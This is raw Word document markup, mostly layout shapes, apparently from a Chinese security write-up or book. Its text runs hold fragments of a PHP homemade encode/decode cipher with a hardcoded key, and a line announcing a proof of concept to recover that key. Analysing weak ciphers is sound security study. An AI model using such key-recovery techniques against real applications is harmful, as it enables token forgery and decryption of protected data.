            <v:rect id="_x0000_s6571" style="position:absolute;left:6135;top:7712;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6570" style="position:absolute;left:6737;top:7712;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6569" style="position:absolute;left:6858;top:7712;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6568" style="position:absolute;left:1617;top:7975;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s6567" type="#_x0000_t75" style="position:absolute;left:1797;top:8038;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s6566" style="position:absolute;left:2197;top:8038;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6565" style="position:absolute;left:3040;top:8038;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6564" style="position:absolute;left:3161;top:8038;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6563" style="position:absolute;left:3281;top:8038;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6562" style="position:absolute;left:3402;top:8038;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6561" style="position:absolute;left:1617;top:8301;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6560" style="position:absolute;left:1797;top:8364;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6559" style="position:absolute;left:1897;top:8364;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6558" style="position:absolute;left:1997;top:8364;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6557" style="position:absolute;left:2097;top:8364;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6556" style="position:absolute;left:2197;top:8364;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6555" style="position:absolute;left:2438;top:8364;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6554" style="position:absolute;left:2558;top:8364;width:1326;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6553" style="position:absolute;left:3884;top:8364;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6552" style="position:absolute;left:4004;top:8364;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6551" style="position:absolute;left:4245;top:8364;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6550" style="position:absolute;left:4366;top:8364;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6549" style="position:absolute;left:5450;top:8364;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6548" style="position:absolute;left:5571;top:8364;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6547" style="position:absolute;left:1617;top:8627;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6546" style="position:absolute;left:1797;top:8690;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6545" style="position:absolute;left:1897;top:8690;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6544" style="position:absolute;left:1997;top:8690;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6543" style="position:absolute;left:2097;top:8690;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6542" style="position:absolute;left:2197;top:8690;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6541" style="position:absolute;left:2297;top:8690;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6540" style="position:absolute;left:2397;top:8690;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6539" style="position:absolute;left:2497;top:8690;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6538" style="position:absolute;left:2597;top:8690;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6537" style="position:absolute;left:2958;top:8690;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6536" style="position:absolute;left:3079;top:8690;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6535" style="position:absolute;left:3440;top:8690;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6534" style="position:absolute;left:3561;top:8690;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6533" style="position:absolute;left:3681;top:8690;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6532" style="position:absolute;left:3802;top:8690;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6531" style="position:absolute;left:4043;top:8690;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6530" style="position:absolute;left:4163;top:8690;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6529" style="position:absolute;left:4404;top:8690;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6528" style="position:absolute;left:4525;top:8690;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6527" style="position:absolute;left:4645;top:8690;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6526" style="position:absolute;left:4766;top:8690;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6525" style="position:absolute;left:6694;top:8690;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6524" style="position:absolute;left:6814;top:8690;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6523" style="position:absolute;left:7417;top:8690;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6522" style="position:absolute;left:7537;top:8690;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6521" style="position:absolute;left:1617;top:8953;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6520" style="position:absolute;left:1797;top:9016;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6519" style="position:absolute;left:1897;top:9016;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6518" style="position:absolute;left:1997;top:9016;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6517" style="position:absolute;left:2097;top:9016;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6516" style="position:absolute;left:2197;top:9016;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6515" style="position:absolute;left:2297;top:9016;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6514" style="position:absolute;left:2397;top:9016;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6513" style="position:absolute;left:2497;top:9016;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6512" style="position:absolute;left:2597;top:9016;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6511" style="position:absolute;left:2697;top:9016;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6510" style="position:absolute;left:2797;top:9016;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6509" style="position:absolute;left:2897;top:9016;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6508" style="position:absolute;left:2997;top:9016;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6507" style="position:absolute;left:3599;top:9016;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6506" style="position:absolute;left:3720;top:9016;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6505" style="position:absolute;left:3840;top:9016;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6504" style="position:absolute;left:3961;top:9016;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6503" style="position:absolute;left:5768;top:9016;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6502" style="position:absolute;left:5889;top:9016;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6501" style="position:absolute;left:6250;top:9016;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6500" style="position:absolute;left:6371;top:9016;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6499" style="position:absolute;left:1617;top:9279;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6498" style="position:absolute;left:1797;top:9342;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6497" style="position:absolute;left:1897;top:9342;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6496" style="position:absolute;left:1997;top:9342;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6495" style="position:absolute;left:2097;top:9342;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6494" style="position:absolute;left:2197;top:9342;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6493" style="position:absolute;left:2297;top:9342;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6492" style="position:absolute;left:2397;top:9342;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6491" style="position:absolute;left:2497;top:9342;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6490" style="position:absolute;left:2597;top:9342;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6489" style="position:absolute;left:2697;top:9342;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6488" style="position:absolute;left:2797;top:9342;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6487" style="position:absolute;left:2897;top:9342;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6486" style="position:absolute;left:2997;top:9342;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s6485" style="position:absolute" from="4001,9342" to="4001,9542" strokecolor="#f8f8f8" strokeweight="4pt"/>
            <v:rect id="_x0000_s6484" style="position:absolute;left:4041;top:9342;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s6483" style="position:absolute" from="4203,9342" to="4203,9542" strokecolor="#f8f8f8" strokeweight="4.05pt"/>
            <v:rect id="_x0000_s6482" style="position:absolute;left:4243;top:9342;width:1446;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s6481" style="position:absolute" from="5729,9342" to="5729,9542" strokecolor="#f8f8f8" strokeweight="4.05pt"/>
            <v:rect id="_x0000_s6480" style="position:absolute;left:5770;top:9342;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s6479" style="position:absolute" from="6171,9342" to="6171,9542" strokecolor="#f8f8f8" strokeweight="4.05pt"/>
            <v:rect id="_x0000_s6478" style="position:absolute;left:6212;top:9342;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s6477" style="position:absolute" from="6374,9342" to="6374,9542" strokecolor="#f8f8f8" strokeweight="4.05pt"/>
            <v:rect id="_x0000_s6476" style="position:absolute;left:6414;top:9342;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s6475" style="position:absolute" from="8020,9342" to="8020,9542" strokecolor="#f8f8f8" strokeweight="4.05pt"/>
            <v:rect id="_x0000_s6474" style="position:absolute;left:8061;top:9342;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6473" style="position:absolute;left:8181;top:9342;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6472" style="position:absolute;left:1617;top:9605;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6471" style="position:absolute;left:1797;top:9668;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6470" style="position:absolute;left:2038;top:9668;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6469" style="position:absolute;left:2158;top:9668;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6468" style="position:absolute;left:1617;top:9931;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6467" style="position:absolute;left:1797;top:9994;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6466" style="position:absolute;left:1897;top:9994;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6465" style="position:absolute;left:1997;top:9994;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6464" style="position:absolute;left:2097;top:9994;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6463" style="position:absolute;left:2197;top:9994;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6462" style="position:absolute;left:2297;top:9994;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6461" style="position:absolute;left:2397;top:9994;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6460" style="position:absolute;left:2497;top:9994;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6459" style="position:absolute;left:2597;top:9994;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6458" style="position:absolute;left:2697;top:9994;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6457" style="position:absolute;left:2797;top:9994;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6456" style="position:absolute;left:2897;top:9994;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6455" style="position:absolute;left:2997;top:9994;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6454" style="position:absolute;left:3599;top:9994;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6453" style="position:absolute;left:3720;top:9994;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6452" style="position:absolute;left:3840;top:9994;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6451" style="position:absolute;left:3961;top:9994;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6450" style="position:absolute;left:5648;top:9994;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6449" style="position:absolute;left:5768;top:9994;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6448" style="position:absolute;left:5889;top:9994;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6447" style="position:absolute;left:6009;top:9994;width:1808;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s6446" type="#_x0000_t202" style="position:absolute;left:1614;top:295;width:6792;height:10145" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="7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&lt;?php</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/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anti_eccode($encrypt, $clear) {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 = null;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$data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str_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replace(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array('-',</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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'_'),</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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array('+',</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-5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'/'),</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124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$encrypt);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="579" w:right="305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$mod4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strlen(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$data) % 4; if ($mod4) {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr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data 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substr('====', $mod4);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$string = base64_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decode(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$data);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124"/>
                      <w:ind w:left="57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strlen($string); $i++) {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$string, $i, 1);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$keychar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$clear, $i, 1);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chr(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ord($char) - ord($keychar));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$char;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 w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="180" w:right="650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$result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$result, 1, strlen($result) - 1).substr</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>($result, 0, 1);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="57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$result;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292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="MS Mincho"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="7"/>
                      <w:rPr>
                        <w:rFonts w:ascii="MS Mincho"/>
                        <w:sz w:val="14"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="1" w:line="388" w:lineRule="auto"/>
                      <w:ind w:left="18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eccode($string,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$operation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2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'DECODE',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$key</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-2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 '@LFK24s224%@safS3s%1f%', $mcrype = true)</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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2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$result = null;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($operation == 'ENCODE') {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strlen($string); $i++) {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/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$string, $i, 1);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/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$keychar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$key,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($i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%</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-4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strlen($key))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-</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124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1, 1);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/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$char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chr(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ord($char) + ord($keychar));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MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>写了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-58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poc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-55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key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="248" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId70"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="140"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:group id="_x0000_s6091" style="position:absolute;margin-left:80.85pt;margin-top:72.25pt;width:337.25pt;height:572.2pt;z-index:-364576;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1617,1445" coordsize="6745,11444">
            <v:rect id="_x0000_s6444" style="position:absolute;left:1617;top:1445;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6443" style="position:absolute;left:1797;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6442" style="position:absolute;left:1897;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6441" style="position:absolute;left:1997;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6440" style="position:absolute;left:2097;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6439" style="position:absolute;left:2197;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6438" style="position:absolute;left:2297;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6437" style="position:absolute;left:2397;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6436" style="position:absolute;left:2497;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6435" style="position:absolute;left:2597;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6434" style="position:absolute;left:2697;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6433" style="position:absolute;left:2797;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6432" style="position:absolute;left:2897;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6431" style="position:absolute;left:2997;top:1688;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6430" style="position:absolute;left:1617;top:1951;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6429" style="position:absolute;left:1797;top:2014;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6428" style="position:absolute;left:1897;top:2014;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6427" style="position:absolute;left:1997;top:2014;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6426" style="position:absolute;left:2097;top:2014;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6425" style="position:absolute;left:2197;top:2014;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6424" style="position:absolute;left:2297;top:2014;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6423" style="position:absolute;left:2397;top:2014;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6422" style="position:absolute;left:2497;top:2014;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6421" style="position:absolute;left:2597;top:2014;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6420" style="position:absolute;left:1617;top:2277;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6419" style="position:absolute;left:1797;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6418" style="position:absolute;left:1897;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6417" style="position:absolute;left:1997;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6416" style="position:absolute;left:2097;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6415" style="position:absolute;left:2197;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6414" style="position:absolute;left:2297;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6413" style="position:absolute;left:2397;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6412" style="position:absolute;left:2497;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6411" style="position:absolute;left:2597;top:2340;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6410" style="position:absolute;left:3440;top:2340;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6409" style="position:absolute;left:3561;top:2340;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6408" style="position:absolute;left:3681;top:2340;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6407" style="position:absolute;left:3802;top:2340;width:2771;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6406" style="position:absolute;left:1617;top:2603;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6405" style="position:absolute;left:1797;top:2666;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6404" style="position:absolute;left:1897;top:2666;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6403" style="position:absolute;left:1997;top:2666;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6402" style="position:absolute;left:2097;top:2666;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6401" style="position:absolute;left:2197;top:2666;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6400" style="position:absolute;left:2297;top:2666;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6399" style="position:absolute;left:2397;top:2666;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
